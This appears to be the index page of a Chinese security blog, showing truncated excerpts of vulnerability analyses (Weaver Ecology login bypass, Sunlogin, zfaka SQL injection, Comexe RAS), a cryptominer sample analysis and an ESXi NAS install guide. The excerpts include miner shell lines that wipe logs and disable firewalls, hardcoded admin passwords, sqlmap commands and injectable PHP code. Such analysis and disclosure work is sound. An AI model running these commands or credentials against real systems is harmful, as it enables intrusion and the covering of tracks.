Sp4ce's Blog

0x01 前言在跟踪泛微补丁包时发现Ecology_security_20230725_v9.0_v10.58.3的SecurityRuleGdLogin0317的补丁疑似修复了一个SQL注入，因此跟踪下看看 上图为补丁关键操作，看内容像是进行了SQL注入检测，后续分析发现是一处任意用户登录 0x02 分析跟踪关键文件login/VerifyGDLogin.jsp 看源码为从URI中获取para、para1、para2后调用PoppupRemindInfoUtil.decrypt对para2做解密，然后通过weaver.login.VerifyGDLogin#getUserCheck方法进行登录校验 其中PoppupRemindInfoUtil.decrypt方法首先会校验WEB-INF/prop/AESpassword.properties中的pwd项是否为空，不为空则赋值给var1，为空则给var1赋值1 然后使用SM4IntegrationUtil.USE_SM4方法判断是否启用了国密SM4加密算法，如启用则使用SM4解密，否则调用AES.decrypt进行解密，默认为f ...

37cfcb12c7124abf53343a0bda42c802262fa671f83b9eada48d82667f626707b5fff804b54875368fb0e38afa828167eccc0b08c63bdf197638b8375e0e36c50f5e6a19271a7a3c0cea5cc36ffc2e5ed71aa9878141806e744adf9daffe518a3fa2600c35291ebc8bd4968026df6d8cdaf9d81913eb618ab5143a7ead71eaff3ec092fd419175372d29901b90f7e6b90329225cab151dfd3b72da846e26f8122c144c8f8869f150fc4804abe5be74ea780ca342a0f4fca8ea6d85d0d024619ac6f1367bef6cc25fb8d6bce700dc6d1a9655688c88b6385bed67142b3cc749d2c5c40172461189ef83afaa8854c6af13fd707b31b70adf7fc ...

分析这个洞有2020/2021年数字那边挖的洞的影子 获取sessionkey mobilemode/public.jsp 分析这个洞有2020/2021年数字那边挖的洞的影子 获取sessionkey mobilemode/public.jsp 该文件无需权限即可访问，阅读代码构造相应参数后即可获取sessionkey String userid;String url;String from = Util.null2String(request.getParameter("from"));if(from.equals("anonymous")){ MobileModeConfig mConfig = MobileModeConfig.getInstance(); if(!mConfig.isAnonymousAccessEnabled()){ out.println("anonymous access is not enabled"); return; &# ...

安装安装部分参考https://wp.gxnas.com/12245.html、https://wp.gxnas.com/12800.html/comment-page-1 坑1. esxi8无法添加硬盘问题在esxi8.0中添加现有硬盘时会出现无法添加问题 解决方法在esxi中存储->数据浏览器->存储库->创建文件夹，上传arpl的2个vmdk文件 然后正常创建虚拟机（虚机名称与上一步文件夹名称保持一致）执行到这一步 删除自带硬盘，然后点添加硬盘->现有硬盘选择arpl盘，确定 此时会报错，新添加硬盘类似如下 此时点击下一步->左侧菜单自定义设置（或上一步）->下一步->完成 此时查看创建好的虚机，硬盘被正常挂载 2.启动找不到引导经过上一步创建好的虚机此时启动会出现找不到引导 解决方法在上一步创建虚机时选择引导选项为BIOS并配置下一次启动强制进入BIOS 调整启动项如下 3. 安装卡56%，报错loader disk neither USB or DOM 硬盘控制器位置问题，关机调整硬盘控制器位置为SATA即可，arpl ...

0x00 相关报道 CNVD： https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 向日葵团队： https://www.oray.com/announcements/affiche/?aid=774 0x01 程序详情测试程序版本为11.0.0.33162，官网目前只开放12.5版本，但是可以遍历下载ID进行下载向日葵为C++编写，使用UPX3.X加壳故此分析前需要进行脱壳处理（github上有UPX项目，可以直接脱）此外向日葵在启动的时候会随机启动一个4W+高位端口并记录在日志中，具体在sub_140E0AAE8可看到 0x02 根据日志找session社会孙在视频中有一段疑似session的字符串根据这段疑似session的关键字在向日葵一次正常远程的日志中找到了关键字CID随后载入IDA，对CID关键字进行搜索找到3个函数存在CID关键字字符串sub_140E20938、sub_140E1C954、sub_140E1A1F4往上跟发现分别对应接口/cgi-bin/rpc和/cgi-bin/login.cgi 其中在函数sub ...

zfaka在安装的时候会新建一个测试帐号[email protected]，密码123456 在文件application/modules/Member/controllers/Profiles.php，profilesajaxAction方法第53行附近存在注入 public function profilesajaxAction() { if ($this->login==FALSE AND !$this->userid) { $data = array('code' => 1000, 'msg' => '请登录'); Helper::response($data); } $nickname = $this->getPost('nickname',false); $qq = $this->getPost('qq',false); $tag = $this-> ...

zfaka官方于7月11日发布了补丁，修复了一处sql注入，简单记录下分析过程 0x01补丁补丁显示修改了application/function/F_Network.php文件，该文件的getClientIP函数使用了网络上通用遍历XFF等header头获取真实IP的方法,但是获取完XFF后根据,截断获取第一个值后直接返回IP 0x02 分析全局搜索下调用该函数的位置，发现前台的application/modules/Product/controllers/Order.php文件和application/modules/Product/controllers/Query.php调用了该函数，对应功能为下单和订单查询功能 进一步确认后为application/modules/Product/controllers/Query.php第151行为存在漏洞的代码 0x03 动态调试对151行下断点进行调试 找到对应功能 成功断下，单步跟入 发现在application/library/Core/Model.php中的Where方法对orderid 、isdelete 、 ip ...

捕获到一个挖矿样本,分析记录下 0x01 源代码分析newinit.sh、init.sh这两个文件差不多，功能写到注释里了 #!/bin/sh### # @Author : Sp4ce # @Date : 2021-07-07 14:20:20 # @LastEditors : Sp4ce # @LastEditTime : 2021-07-07 20:41:59 # @Description : Challenge Everything.### ulimit -n 65535#删除syslog等rm -rf /var/log/syslogchmod 777 /usr/bin/chattrchmod 777 /bin/chattrchattr -iua /tmp/chattr -iua /var/tmp/ufw disableiptables -Fsysctl kernel.nmi_watchdog=0echo '0' >/proc/sys/kernel/nmi_watchdogecho 'ker ...

cf28e38f6ac4f5e95851816814fbdda9dfd279056c49edf577de2f9ccd08ee5e64d5d3018edcec73f0700693bbfbdee982372d8b819547d266a278d01d8abe7665bd005358cffb620eacdfc6e6f4dcd16735b03514184fdb57e594c3970394e1996bebff558e874d58822c536c47dbf7adaecdb927855fc803aaa13827e72d6bbaf0dc1e83abfe64838018bd61937e396bf8c82dbf696f4b7a46d1ff670e305068c4e543ebd012c0969abd6774689f8551540c6b7875d3c510018e47e4f247b9d5ddc6c3394f79fbdb60049cb3d752fd03f2bcd92b7e2e24a338b6f74da130b0f41d3fd572d2931368f8094b7aeed7b22748634459b91d495 ...

应急时碰到的一套系统，简单记录下 0x01 硬编码问题科迈RAS4.0在安装时会创建2个管理员账户RAS_admin、RASCOM，这两个账户硬编码了2组密码， 账户名 密码 RASCOM 1A2b3C4d56. RAS_admin R1a2b3c4d56. 这就导致如果机器开了RDP，那么可以通过这两组帐密直接登录 0x02 SQL注入问题审计的时候发现这套源码通过COM组件形式调用的SQL语句，IDA里看到均为直接拼接，没有做过滤 Server/CmxCheckBind.php python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxCheckBind.php?a=1&b=2&c=3&d=4&from=5" --level 5 --risk 3 Server/CmxBindMachine.php python3 sqlmap.py -u "http://10.100.100.133:8088/Server/Cmx ...

SQL注入文件inter/update_software_info.php <?php//客户端显示数据require_once "./use_db.php";require_once "./common/functions.php";$return=array();$return["nResult"] =0;$where='where 1=1';if (!is_null($_POST['type']) and $_POST['type'] !="") { $id=$_POST['type']; $where .=" and type=$id ";}if (!is_null($_POST['key'])) { $keyname=$_POST['key']; $where .=" and keyname ...

SQL注入inter/handler_get_set_data/set_sc_count_online_setup_data_cmd.php 函数set_sc_count_online_setup_data_cmd function set_sc_count_online_setup_data_cmd($para) { global $logHandler, $mysqlDB;// $logHandler->LogError('set_sc_count_online_setup_data_cmd'); $keyData = array("client","server","scid"); $check = checkParam($keyData,$para,$logHandler); if ($check !== true) return false; $SCID= $para['scid']; $data_type=' ...